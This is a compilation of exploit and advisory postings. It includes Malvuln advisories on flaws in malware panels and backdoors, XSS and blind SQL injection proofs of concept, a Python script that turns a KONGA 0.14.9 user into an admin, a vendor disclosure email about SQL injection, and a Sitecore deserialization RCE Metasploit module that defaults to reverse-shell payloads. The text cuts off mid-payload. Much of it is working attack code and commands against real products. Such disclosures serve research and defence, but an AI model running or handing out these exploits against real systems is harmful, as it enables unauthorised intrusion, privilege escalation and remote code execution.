<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/54530f88c8e4f4371c9418f00c256b1d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CollectorStealerBuilder v2.0.0 Panel<br />Vulnerability: Insecure Credential Storage<br />Description: The panel for Collector Stealer malware stores the login creds in plaintext in its MySQL database. Third-party attackers who gain access to the system can read the database username passwords without having to crack them offline.<br />Type: WebUI<br />MD5: 54530f88c8e4f4371c9418f00c256b1d<br />MD5: 8c003105229554557c75ec836b4fcf79 (collect.php)<br />Vuln ID: MVID-2022-0458<br />Disclosure: 01/19/2022<br /><br />Exploit/PoC:<br />--<br />-- phpMyAdmin SQL Dump<br />-- version 4.9.7<br />-- https://www.phpmyadmin.net/<br />--<br />-- Хост: localhost<br />-- Время создания: Фев 22 2021 г., 19:56<br />-- Версия сервера: 5.7.21-20-beget-5.7.21-20-1-log<br />-- Версия PHP: 5.6.40<br /><br />SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";<br />SET AUTOCOMMIT = 0;<br />START TRANSACTION;<br />SET time_zone = "+00:00";<br /><br /><br />/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;<br />/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;<br />/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;<br />/*!40101 SET NAMES utf8mb4 */;<br /><br />--<br />-- База данных: `jkrefsewer_1`<br />--<br /><br />-- --------------------------------------------------------<br /><br />--<br />-- Структура таблицы `Information`<br />--<br />-- Создание: Фев 19 2021 г., 11:04<br />-- Последнее обновление: Фев 22 2021 г., 16:54<br />--<br /><br />DROP TABLE IF EXISTS `Information`;<br />CREATE TABLE `Information` (<br /> `Build` text NOT NULL,<br /> `hash` text,<br /> `Date` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' ON UPDATE CURRENT_TIMESTAMP,<br /> `Country` text,<br /> `IP` text,<br /> `Cookies` int(11) DEFAULT NULL,<br /> `Passwords` int(11) DEFAULT NULL,<br /> `Cards` int(11) DEFAULT NULL,<br /> `Wallets` int(11) DEFAULT NULL,<br /> `Path` text<br />) ENGINE=InnoDB DEFAULT CHARSET=utf8;<br /><br />-- --------------------------------------------------------<br /><br />--<br />-- Структура таблицы `users`<br />--<br />-- Создание: Фев 17 2021 г., 14:15<br />--<br /><br />DROP TABLE IF EXISTS `users`;<br />CREATE TABLE `users` (<br /> `id` int(11) NOT NULL,<br /> `username` varchar(45) COLLATE utf8_unicode_ci NOT NULL,<br /> `password` varchar(45) COLLATE utf8_unicode_ci NOT NULL<br />) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;<br /><br />--<br />-- Дамп данных таблицы `users`<br />--<br /><br />INSERT INTO `users` (`id`, `username`, `password`) VALUES<br />(1, 'admin', 'admin');<br /><br />--<br />-- Индексы сохранённых таблиц<br />--<br /><br />--<br />-- Индексы таблицы `users`<br />--<br />ALTER TABLE `users`<br /> ADD PRIMARY KEY (`id`);<br /><br />--<br />-- AUTO_INCREMENT для сохранённых таблиц<br />--<br /><br />--<br />-- AUTO_INCREMENT для таблицы `users`<br />--<br />ALTER TABLE `users`<br /> MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;<br />COMMIT;<br /><br />/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;<br />/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;<br />/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 11/11/2021<br /># Exploit Author: Mohammed Aadhil Ashfaq<br /># Vendor Homepage: https://form2email.dwbooster.com/<br /># Version: 1.3.24<br /># Tested on: wordpress<br /><br />POC<br />1. Click Contact form to Email<br />http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail<br />2. Create new form name with <script>alert(1)</script><br />3. Click Publish<br />4. XSS has been triggered<br />http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687<br />5. Open a different browser, logged in with wordpress. Copy the URL and<br />Press enter. XSS will trigger.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/ca294b2f778abc14fef6313b3cea7155.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: VulturiBuilder<br />Vulnerability: Insecure Permissions<br />Description: The malware writes an .EXE with insecure permissions under c:\ drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: ca294b2f778abc14fef6313b3cea7155<br />Vuln ID: MVID-2022-0457<br />Disclosure: 01/19/2022 <br /><br /><br />Exploit/PoC:<br />C:\>cacls hate.exe<br />C:\hate.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir hate.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />01/11/2022 07:25 PM 298,496 hate.exe<br /> 1 File(s) 298,496 bytes<br /> 0 Dir(s) 27,531,624,448 bytes free<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: KONGA 0.14.9 - Privilege Escalation<br /># Date: 10/11/2021<br /># Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec)<br /># Vendor Homepage: https://github.com/pantsel/konga<br /># Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip<br /># Version: 0.14.9<br /># Tested on: Linux - Ubuntu 20.04.3 LTS (focal)<br /><br /><br /><br />import requests<br />import json<br /><br />urlkonga = "http://www.example.com:1337/" # change to your konga address<br />identifier = "usernormalkonga" # change user<br />password = "changeme" # change password<br /><br />headers = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", <br /> "Content-Type": "application/json;charset=utf-8", <br /> "connection-id": "", <br /> "Origin": urlkonga,<br /> "Referer": urlkonga<br />}<br /><br />url = urlkonga+"login"<br /><br />data = {<br /> "identifier":identifier,<br /> "password":password<br />}<br /><br />response = requests.post(url, json=data)<br />json_object = json.loads(response.text)<br />print("[+] Attack")<br />print("[+] Token " + json_object["token"])<br /><br />url2 = urlkonga+"api/user/"+str(json_object["user"]["id"])<br />id = json_object["user"]["id"]<br />print("[+] Exploiting User ID "+str(json_object["user"]["id"]))<br /><br />data2 = {<br /> "admin": "true",<br /> "passports": {<br /> "password": password,<br /> "protocol": "local"<br /> },<br /> "password_confirmation": password,<br /> "token":json_object["token"]<br />}<br /><br />print("[+] Change Normal User to Admin")<br />response2 = requests.put(url2, headers=headers, json=data2)<br />print("[+] Success")<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/204613443e555f73237ea43a2faecaa5_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.16<br />Vulnerability: Weak Hardcoded Credentials<br />Description: The malware runs with SYSTEM integrity, listens on TCP port 1015 and is protected by Armadillo(3.00a-3.70a) & UPX(1.07)NRV,brute. However, the password "ddr_bkdoor" is weak and can be found at offset 0019F58C.<br />Type: PE32<br />MD5: 204613443e555f73237ea43a2faecaa5<br />Vuln ID: MVID-2022-0463<br />Dropped files: ddradmin.exe<br />Disclosure: 01/20/2022 <br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 1015<br />Login: ddr_bkdoor<br /><br />Login succeed!<br /><br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#HELP<br /><br />DOS Switch to MS-DOS prompt<br />DIR/LS/LIST Directory and file list<br />CD Entry directory<br />MD/MKDIR Make directory<br />PWD Get current dirctory<br />COPY/CP Copy file<br />DEL/RM Delete directory/file<br />REN/RENAME Rename file<br />MOVE/MV Move file<br />TYPE/CAT Type text file<br /><br />POPMSG Popup message box<br />SYSINFO Get system information<br />WHO/W Get current connections<br /><br />SHELL Execute command by system shell(cmd.exe)<br />EXEC/RUN Execute file by windows API(WinExec)<br />WS Windows list<br />PS Process list<br />KILL Kill process<br /><br />GET/GETFILE Download file from remote machine<br />PUT/PUTFILE Upload file to remote machine<br />WGET Get file from web server<br />FGET Get file from ftp server<br />FPUT Put file to ftp server<br />TELNET Connect to other host<br /><br />FTPD Start ftp service<br />TELNETD/TELD/EXPORT Start telnet service (export shell)<br /><br />REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port><br />REDIR_STOP Stop redirect tcp data<br />SNIFF Sniff ftp/smtp/pop3/http password what via ethernet<br />SNIFF_STOP Stop ethernet sniffer<br />KEYLOG Start keyboard record<br />KEYLOG_STOP Stop keyboard record<br /><br />REBOOT Reboot windows<br />SHUTDOWN Shutdown windows<br />EXIT Close current connection<br />QUIT Close all connection and abort service<br />REMOVE Remove service<br />VER/VERSION Version information<br />HELP/H/? Show help message<br /><br />Type "HELP | MORE" for multipage display.<br /><br />Command "HELP" succeed.<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#POPMSG malvuln was here<br /><br />Command "POPMSG" succeed.<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Dear Full Disclosure Team,<br /><br />We are writing to submit a full disclosure for the following vulnerability<br />discovered for product Talariax sendQuick Alertplus server admin version<br />4.3. This is an updated reference for<br />https://seclists.org/fulldisclosure/2021/Oct/1.<br /><br />------------------------------------------------------------------------<br />*Title:* SQL injection vulnerability in Talariax sendQuick Alertplus server<br />admin version 4.3<br /><br />*CVE Reference:* **RESERVED** CVE-2021-26795<br />*Product:* Talariax sendQuick Alertplus server admin<br />*Vendor:* TalariaX Pte Ltd<br />*Vulnerable version: *Talariax sendQuick Alertplus Server Admin version 4.3<br />Patch no 8HF8 and below.<br />*Fixed version: *Patch no 8HF11<br />*Impact: *High<br />*Vulnerability Type:* SQL Injection (CWE-89)<br />*Vendor notification (and approval for disclosure):* 2021-Oct-05<br />*Public Disclosure:* 2021-Oct-06<br />*Discoverer: *Jerry Toh (t.ghimhong@gmail.com), Edmund Ong (<br />edmund.okx@gmail.com)<br /><br />------------------------------------------------------------------------<br /><br />*Vulnerability details: *<br /><br />SQL Injection in the web interface of Talariax sendQuick Alertplus server<br />admin allows an authenticated user to perform error-based SQL injection via<br />unsanitized form fields.<br /><br />The affected URL is found in the Roster Management function:<br />/appliance/shiftmgn.php<br /><br />The attached screenshots (see evidence*.jpeg) shows that:<br />(1) Vulnerability was discovered showing that there is an error message<br />which states that the SQL Syntax error after a single quotation mark was<br />appended upon the form submission causing an error message which is thrown<br />from the database<br />(2) Finding was subsequently verified as fixed after input validation was<br />implemented in the fields.<br /><br /><br />------------------------------------------------------------------------<br /><br />*Proof of concept:*<br /><br />The following input fields were found to be vulnerable to SQL injection:<br />Navigate to "Roster Management" > Select Edit Roster > Day Selected > Input<br />fields "Roster Time". (see evidence-2.jpeg). The screenshot above shows<br />that there is an error message which states that the SQL Syntax error,<br />after a single quotation mark ('), is being appended upon the form<br />submission.<br /><br />------------------------------------------------------------------------<br /><br />*Remediation:*<br /><br />Although the patch (Patch no 8HF11) was tested to have fixed this, it is<br />still recommended to use the latest product version/patches. Please<br />approach the vendor for the latest product patches.<br /><br />------------------------------------------------------------------------<br /><br />*Disclosure details:*<br />- 2021/10/04 Contacted email for permission to disclose<br />- 2021/10/05 Vendor responded and approved for public disclosure submission<br />- 2021/10/06 Public disclosure on SecList (<br />https://seclists.org/fulldisclosure/2021/Oct/1)<br />- 2021/11/11 Added CVE details for public disclosure reference<br /><br />-----------------------------------------------------------------------------------<br />*Additional references:*<br />Below email attachment is the request approval for disclosure by vendor<br /><br />Delivered-To: edmund.okx@gmail.com<br />Received: by 2002:a67:c982:0:0:0:0:0 with SMTP id y2csp1780343vsk;<br /> Mon, 4 Oct 2021 21:31:06 -0700 (PDT)<br /> (envelope-from <jswong@talariax.com>) id 1mXc6V-0004bO-R8; Tue, 05 Oct<br />2021 12:30:58 +0800<br />Reply-To: jswong@talariax.com<br />Subject: Re: Responsible disclosure of vulnerability in Talariax sendQuick<br />Alertplus server admin (patched)<br />To: Edmund Ong <edmund.okx@gmail.com><br />Cc: t.ghimhong@gmail.com<br />References: <CAO0qOZwUuMcjpwvdAg1B4vZ-qrWHfwjixaMMTDh2=<br />11Nr3N47g@mail.gmail.com><br />From: JS Wong <jswong@talariax.com><br />Organization: TalariaX Pte Ltd<br />Message-ID: <47e14d24-ee1d-5b06-8f2f-20c7fa586957@talariax.com><br />Date: Tue, 5 Oct 2021 12:30:58 +0800<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0)<br />Gecko/20100101 Thunderbird/78.14.0<br /><br />--------------DBF6FC3FBFBCBF83D5A5DEEB<br />Content-Type: text/plain; charset=utf-8; format=flowed<br />Content-Transfer-Encoding: 8bit<br /><br />Dear Edmund<br /><br />Hi! Thanks for informing us on the issue found. We are pleased to inform<br />that we had fixed the issue in our patches and as long as customer<br />update to the latest patches, the issue is resolved.<br /><br />If you wish to submit to public domain as CVE, we will not stop you from<br />doing so.<br /><br />Thanks for informing us<br /><br />Regards<br /><br />JS<br /><br />On 4/10/2021 7:24 pm, Edmund Ong wrote:<br />> Dear Talariax,<br />><br />> We discovered a SQL injection vulnerability on one of your product<br />> Talariax sendQuick Alertplus server admin during the period of Q4-2020<br />> to Q1-2021.<br />><br />> This commercial off-the-shelf product was used by one of our clients<br />> and they may or may not have reported this to you. The finding was<br />> subsequently addressed and finding was closed (as shown in the<br />> screenshots the affected patch no 8HF8, and the fix released was patch<br />> no 8HF11) although we do not have the specific product version that is<br />> affected but we have reason to believe that at that point of testing<br />> the product Talariax sendQuick Alertplus server admin version was<br />> version 4.3 (do correct us if this is wrong). We felt responsible to<br />> share this finding with you directly so that you could ensure this<br />> vulnerability would be (or had been) addressed in all subsequent<br />> releases.<br />><br />> *Finding details:* SQL Injection in the web interface of Talariax<br />> sendQuick Alertplus server admin allows an authenticated user to<br />> perform error-based SQL injection via unsanitized form fields.<br />><br />> *Affected URL:* /appliance/shiftmgn.php<br />><br />> *Evidence* (see attached screenshots evidence*.jpeg)<br />> We attached the following screenshots to evidence that:<br />> (1) Vulnerability was discovered showing that there is an error<br />> message which states that the SQL Syntax error after a single<br />> quotation mark was appended upon the form submission causing an error<br />> message which is thrown from the database<br />> (2) Finding was subsequently verified as fixed after input validation<br />> was implemented in the fields.<br />><br />> We would also like to seek your approval for us to perform responsible<br />> disclosure to the public of this information. The intention is to help<br />> potential victims gain knowledge and raise awareness that<br />> vulnerability exists, Talariax could also provide us a<br />> recommendation if you so please so that we could include in the<br />> writeup (e.g. such as to update to the latest patch and versions).<br />> Please note that if we don't hear from you within 14 days, we will<br />> proceed to do full disclosure through<br />> https://nmap.org/mailman/listinfo/fulldisclosure<br />> <https://nmap.org/mailman/listinfo/fulldisclosure>.<br />><br />> --<br />> Yours Sincerely,<br />> Edmund Ong<br /><br />-- <br />JS Wong (Mr.)<br />TalariaX Pte Ltd<br />76 Playfair Road #08-01 LHK2<br />Singapore 367996<br />Tel: +65 62802881 Fax: +65 62806882<br />Mobile: +65 96367680<br />Web: http://www.talariax.com<br /><br />CONFIDENTIALITY NOTE: This email and any files transmitted with it is<br />intended only for the use of the person(s)<br />to whom it is addressed, and may contain information that is privileged,<br />confidential and exempt from disclosure<br />under applicable law. If you are not the intended recipient, please<br />immediately notify the sender and delete<br />the email. If you are not the intended recipient please do not disclose,<br />copy, distribute or take any action in<br />reliance on the contents of this e-mail. Thank you.<br /><br /><br />------------------------------------------------------------------------<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/204613443e555f73237ea43a2faecaa5.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.16<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP port 1015 and has an FTPD feature that when enabled listens on TCP port 21. Third-party attackers who can reach an infected system can logon using any username/password combination.<br />Type: PE32<br />MD5: 204613443e555f73237ea43a2faecaa5<br />Vuln ID: MVID-2022-0462<br />Dropped files: ddradmin.exe<br />Disclosure: 01/20/2022 <br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 21<br />220 Welcome to X-Ftp server ...<br />USER malvuln<br />331 User name okay, need password.<br />PASS malvuln<br />230 User logged in, proceed.<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Fuel CMS 1.4.13 - 'col' Parameter Blind SQL Injection<br />(Authenticated)<br /># Date: 2021-04-11<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: https://www.getfuelcms.com/<br /># Software Link:<br />https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip<br /># Version: 1.4.13<br /># Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46<br /><br />Steps to Reproduce:<br />1. At first login your panel<br />2. then go to "Activity Log" menu<br />3. then select any type option<br />4. their "col" parameter is vulnerable. Let's try to inject Blind SQL<br />Injection using this query "and (select * from(select(sleep(1)))a)" in<br />"col=" parameter.<br /><br />POC:<br />http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date<br />and (select * from(select(sleep(1)))a)&fuel_inline=0<br /><br />Output:<br />By issuing sleep(0) response will be delayed to 0 seconds.<br />By issuing sleep(1) response will be delayed to 1 seconds.<br />By issuing sleep(5) response will be delayed to 5 seconds.<br />By issuing sleep(10) response will be delayed to 10 seconds<br /></code></pre>
<pre><code>Document Title:<br />===============<br />Banco Guayaquil Versión 8.0.0 IOS - Cross Site Scripting Stored<br /><br />Credits & Authors:<br />==================<br />TaurusOmar - @TaurusOmar_ (whoami@taurusomar.com) [taurusomar.com]<br /><br />Vendor Homepage: https://apps.apple.com/ec/app/banco-guayaquil/id624963066<br />===============<br /><br />Release Date:<br />=============<br />2022-01-21<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation vulnerability in the name value is estimated as medium. (CVSS 3.7)<br /><br /><br />Product & Service Introduction:<br />===============================<br />Official application of Banco Guayaquil to manage your finances your products with Banco Guayaquil, Make transactions from your accounts, Pay credit cards, <br />loans and services as well as access your movements, Deposit checks, Request checkbooks, block cards, activate or deactivate consumption of the Internet and much more.<br /><br /><br />Abstract Advisory Information:<br />==============================<br />An independent Vulnerability Laboratory researcher discovered multiple vulnerabilities in the official aplication Banco Guayaquil 8.0.0.<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-21: Public Disclosure <br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Affected Product(s):<br />====================<br />Readdle<br />Product: Banco Guayaquil - iOS Mobile Application<br /><br /><br />Exploitation Technique:<br />=======================<br />Local<br /><br /><br />Severity Level:<br />===============<br />Low<br /><br /><br />Technical Details & Description:<br />================================<br />An application-side input validation vulnerability has been discovered in the official Banco Guayaquil iOS mobile application.<br />The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module.<br />The vulnerability exists in the TextBox Name Profile in which injects the code is activated When the application is opened and close the app.<br /><br />Request Method(s):<br /> [+] Import<br /><br />Vulnerable Module(s):<br /> [+] Add Name <br /><br />Vulnerable Parameter(s):<br /> [+] TextBox Name Profile<br /><br />Vulnerable Final(s):<br /> [+] Save Profile <br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerability can be exploited by local attackers with system user account and without .<br />For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.<br /><br />1. Install the ios application ( https://apps.apple.com/ec/app/banco-guayaquil/id624963066)<br />2. Add new name profile with script in the TexBox Name <br />2. Save Profile<br />3. Close app<br />4. Open Aplication<br />4. Successful reproduce of the persistent vulnerability!<br /><br /><br />Proof of Concept (IMAGES):<br />=======================<br />1. https://i.imgur.com/Cc1VFUf.png<br />2. https://i.imgur.com/r1HWwrs.png<br /><br /><br />Proof of Concept (VIDEO):<br />=======================<br />1. https://imgur.com/a/lQHt1br<br /><br /><br />Payload: Cross Site Scripting<br />============================<br />Use Breaks JS Context: <object data>, javascript:alert, <img onerror><br /><br />text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg<br /><br /> <br />#######<br />#<br /># Disclaimer:<br /># This or previous programs are for Educational purpose ONLY. Do not use it without permission. <br /># The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages <br /># caused by direct or indirect use of the information or functionality provided by these programs. <br /># The author or any Internet provider bears NO responsibility for content or misuse of these programs <br /># or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, <br /># system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's <br /># responsibility.<br />#<br />#######<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Powershell<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Sitecore Experience Platform (XP) PreAuth Deserialization RCE',<br /> 'Description' => %q{<br /> This module exploits a deserialization vulnerability in the Report.ashx page<br /> of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.<br /> Versions 7.2.6 and earlier and 9.0 and later are not affected.<br /><br /> The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll<br /> under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest()<br /> handler that calls ProcessReport() with the context of the attacker's request without properly<br /> checking if the attacker is authenticated or not.<br /><br /> This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will<br /> end up calling the DeserializeParameters() function of<br /> Sitecore.Analytics.Reporting.ReportDataSerializer, if a "parameters" XML tag is found in<br /> the attacker's request.<br /><br /> Then for each subelement named "parameter", the code will check that it has a name and<br /> if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is<br /> vulnerable to deserialization attacks and can be trivially exploited by using the<br /> TypeConfuseDelegate gadget chain.<br /><br /> By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user<br /> that IIS is running as, aka NT AUTHORITY\NETWORK SERVICE. Users can then use technique 4<br /> of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.<br /> },<br /> 'Author' => [<br /> 'AssetNote', # Discovery and exploit<br /> 'gwillcox-r7' # Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-42237'],<br /> ['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'],<br /> ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'],<br /> ],<br /> 'DisclosureDate' => '2021-11-02',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false, # Gains NT AUTHORITY\NETWORK SERVICE privileges. Possible to elevate to SYSTEM but this isn't done automatically.<br /> 'Targets' => [<br /> [<br /> 'Windows Command',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :win_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Dropper',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :win_dropper,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'PowerShell Stager',<br /> {<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :psh_stager,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path of Sitecore', '/'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx')<br /> )<br /><br /> unless res<br /> return CheckCode::Unknown('Target did not respond to check.')<br /> end<br /><br /> unless res.code == 200 && res.body.include?('Sitecore.Analytics.Reporting.ReportDataSerializer.DeserializeQuery')<br /> return CheckCode::Safe('Target is not running Sitecore XP or has patched the vulnerability.')<br /> end<br /><br /> return CheckCode::Appears('Response.ashx is accessible and appears to be deserializing data!')<br /> end<br /><br /> def xml_payload(cmd)<br /> %|<parameters><br /> <parameter name=""><br /> <ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"<br /> xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"<br /> xmlns:i="http://www.w3.org/2001/XMLSchema-instance"<br /> xmlns:x="http://www.w3.org/2001/XMLSchema"<br /> xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"><br /> <Count z:Id="2" z:Type="System.Int32" z:Assembly="0"<br /> xmlns="">2</Count><br /> <Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"<br /> xmlns=""><br /> <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"<br /> xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic"<br /> xmlns:a="http://schemas.datacontract.org/2004/07/System"><br /> <Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"<br /> xmlns=""><br /> <a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly><br /> <a:delegateEntry z:Id="7"><br /> <a:assembly z:Ref="6" i:nil="true"/><br /> <a:delegateEntry i:nil="true"/><br /> <a:methodName z:Id="8">Compare</a:methodName><br /> <a:target i:nil="true"/><br /> <a:targetTypeAssembly z:Ref="6" i:nil="true"/><br /> <a:targetTypeName 